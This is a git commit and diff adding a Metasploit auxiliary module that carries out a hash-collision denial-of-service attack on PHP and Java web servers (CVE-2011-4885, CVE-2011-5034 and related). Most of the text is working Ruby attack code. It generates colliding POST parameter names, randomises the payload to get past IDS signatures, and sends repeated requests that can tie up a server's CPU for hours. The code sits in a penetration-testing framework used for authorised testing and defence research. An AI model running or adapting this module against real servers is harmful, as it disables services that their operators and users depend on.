Adding FireFart's hashcollision DoS module

Have some minor edits below, looks like it all works now though.

Squashed commit of the following:

commit b7befd4889f12105f36794b1caca316d1691b335
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:31:32 2012 -0500

    Removing ord in favor of unpack.

    Also renaming a 'character' variable to 'c' rather than 'i' which is
    easy to mistake for an Integer counter variable.

commit e80f6a5622df2136bc3557b2385822ba077e6469
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:24:41 2012 -0500

    Cleaning up print msgs

commit 5fd65ed54cb47834dc646fdca8f047fca4b74953
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:19:10 2012 -0500

    Clean up hashcollision_dos description

    Caps, mostly. One sentence I still don't get but it's not really a show
    stopper.

commit bec0ee43dc9078d34a328eb416970cdc446e6430
Author: Christian Mehlmauer <FireFart@gmail.com>
Date:   Thu May 24 19:11:32 2012 +0200

    Removed RPORT, ruby 1.8 safe, no case insensitive check, error handling

commit 20793f0dfd9103c4d7067a71e81212b48318d183
Author: Christian Mehlmauer <FireFart@gmail.com>
Date:   Tue May 22 23:11:53 2012 +0200

    Hashcollision Script (again)

modules/auxiliary/dos/http/hashcollision_dos.rb

@@ -0,0 +1,221 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Hashtable Collisions',
+			'Description'   => %q{
+				This module uses a denial-of-service (DoS) condition appearing in a variety of
+				programming languages. This vulnerability occurs when storing multiple values
+				in a hash table and all values have the same hash value. This can cause a web server
+				parsing the POST parameters issued with a request into a hash table to consume
+				hours of CPU with a single HTTP request.
+
+				Currently, only the hash functions for PHP and Java are implemented.
+				This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.
+				It also generates a random payload to bypass some IDS signatures.
+			},
+			'Author'        =>
+				[
+					'Alexander Klink', # advisory
+					'Julian Waelde', # advisory
+					'Scott A. Crosby', # original advisory
+					'Dan S. Wallach', # original advisory
+					'Krzysztof Kotowicz', # payload generator
+					'Christian Mehlmauer <FireFart[at]gmail.com>' # metasploit module
+				],
+			'License'       => MSF_LICENSE,
+			'Version'       => '$Revision$',
+			'References'    =>
+				[
+					['URL', 'http://www.ocert.org/advisories/ocert-2011-003.html'],
+					['URL', 'http://www.nruns.com/_downloads/advisory28122011.pdf'],
+					['URL', 'http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html'],
+					['URL', 'http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf'],
+					['URL', 'http://www.youtube.com/watch?v=R2Cq3CLI6H8'],
+					['CVE', '2011-5034'],
+					['CVE', '2011-5035'],
+					['CVE', '2011-4885'],
+					['CVE', '2011-4858']
+				],
+			'DisclosureDate'=> 'Dec 28 2011'
+		))
+
+		register_options(
+		[
+			OptEnum.new('TARGET', [ true, 'Target to attack', nil, ['PHP','Java']]),
+			OptString.new('URL', [ true, "The request URI", '/' ]),
+			OptInt.new('RLIMIT', [ true, "Number of requests to send", 50 ])
+		], self.class)
+
+		register_advanced_options(
+		[
+			OptInt.new('recursivemax', [false, "Maximum recursions when searching for collisionchars", 15]),
+			OptInt.new('maxpayloadsize', [false, "Maximum size of the Payload in Megabyte. Autoadjust if 0", 0]),
+			OptInt.new('collisionchars', [false, "Number of colliding chars to find", 5]),
+			OptInt.new('collisioncharlength', [false, "Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)", 2]),
+			OptInt.new('payloadlength', [false, "Length of each parameter in the payload", 8])
+		], self.class)
+	end
+
+	def generate_payload
+		# Taken from:
+		# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
+
+		@recursive_counter = 1
+		collision_chars = compute_collision_chars
+		return nil if collision_chars == nil
+
+		length = datastore['payloadlength']
+		size = collision_chars.length
+		post = ""
+		max_value_float = size ** length
+		max_value_int = max_value_float.floor
+		print_status("Generating POST data...")
+		for i in 0.upto(max_value_int)
+			input_string = i.to_s(size)
+			result = input_string.rjust(length, "0")
+			collision_chars.each do |key, value|
+				result = result.gsub(key, value)
+			end
+			post << "#{Rex::Text.uri_encode(result)}=&"
+		end
+		return post
+	end
+
+	def compute_collision_chars
+		print_status("Trying to find hashes...") if @recursive_counter == 1
+		hashes = {}
+		counter = 0
+		length = datastore['collisioncharlength']
+		a = []
+		for i in @char_range
+			a << i.chr
+		end
+		# Generate all possible strings
+		source = a
+		for i in Range.new(1,length-1)
+			source = source.product(a)
+		end
+		source = source.map(&:join)
+		# and pick a random one
+		base_str = source.sample
+		base_hash = @function.call(base_str)
+		hashes[counter.to_s] = base_str
+		counter = counter + 1
+		for item in source
+			if item == base_str
+				next
+			end
+			if @function.call(item) == base_hash
+				# Hooray we found a matching hash
+				hashes[counter.to_s] = item
+				counter = counter + 1
+			end
+			if counter >= datastore['collisionchars']
+				break
+			end
+		end
+		if counter < datastore['collisionchars']
+			# Try it again
+			if @recursive_counter > datastore['recursivemax']
+				print_error("Not enough values found. Please start this script again.")
+				return nil
+			end
+			print_status("#{@recursive_counter}: Not enough values found. Trying again...")
+			@recursive_counter = @recursive_counter + 1
+			hashes = compute_collision_chars
+		else
+			print_status("Found values:")
+			hashes.each_value do |item|
+				print_status("\tValue: #{item}\tHash: #{@function.call(item)}")
+				item.each_char do |c|
+					print_status("\t\tValue: #{c}\tCharcode: #{c.unpack("C")}")
+				end
+			end
+		end
+		return hashes
+	end
+
+	# General hash function, Dan "djb" Bernstein times XX add
+	def djbxa(input_string, base, start)
+		counter = input_string.length - 1
+		result = start
+		input_string.each_char do |item|
+			result = result + ((base ** counter) * item.ord)
+			counter = counter - 1
+		end
+		return result.round
+	end
+
+	# PHP's hash function (djb times 33 add)
+	def djbx33a(input_string)
+		return djbxa(input_string, 33, 5381)
+	end
+
+	# Java's hash function (djb times 31 add)
+	def djbx31a(input_string)
+		return djbxa(input_string, 31, 0)
+	end
+
+	def run
+		case datastore['TARGET']
+			when /PHP/
+				@function = method(:djbx33a)
+				@char_range = Range.new(0, 255)
+				if (datastore['maxpayloadsize'] <= 0)
+					datastore['maxpayloadsize'] = 8
+				end
+			when /Java/
+				@function = method(:djbx31a)
+				@char_range = Range.new(0, 128)
+				if (datastore['maxpayloadsize'] <= 0)
+					datastore['maxpayloadsize'] = 2
+				end
+			else
+				raise RuntimeError, "Target #{datastore['TARGET']} not supported"
+		end
+
+		print_status("Generating payload...")
+		payload = generate_payload
+		return if payload == nil
+		# trim to maximum payload size (in MB)
+		max_in_mb = datastore['maxpayloadsize']*1024*1024
+		payload = payload[0,max_in_mb]
+		# remove last invalid(cut off) parameter
+		position = payload.rindex("=&")
+		payload = payload[0,position+1]
+		print_status("Payload generated")
+
+		for x in 1..datastore['RLIMIT']
+			print_status("Sending request ##{x}...")
+			opts = {
+				'method'	=> 'POST',
+				'uri'		=> datastore['URL'],
+				'data'		=> payload
+			}
+			begin
+				c = connect
+				r = c.request_cgi(opts)
+				c.send_request(r)
+				# Don't wait for a response, can take hours
+			rescue ::Rex::ConnectionError => exception
+				print_error("#{rhost}:#{rport} - unable to connect: '#{exception.message}'")
+				return
+			ensure
+				disconnect(c) if c
+			end
+		end
+	end
+end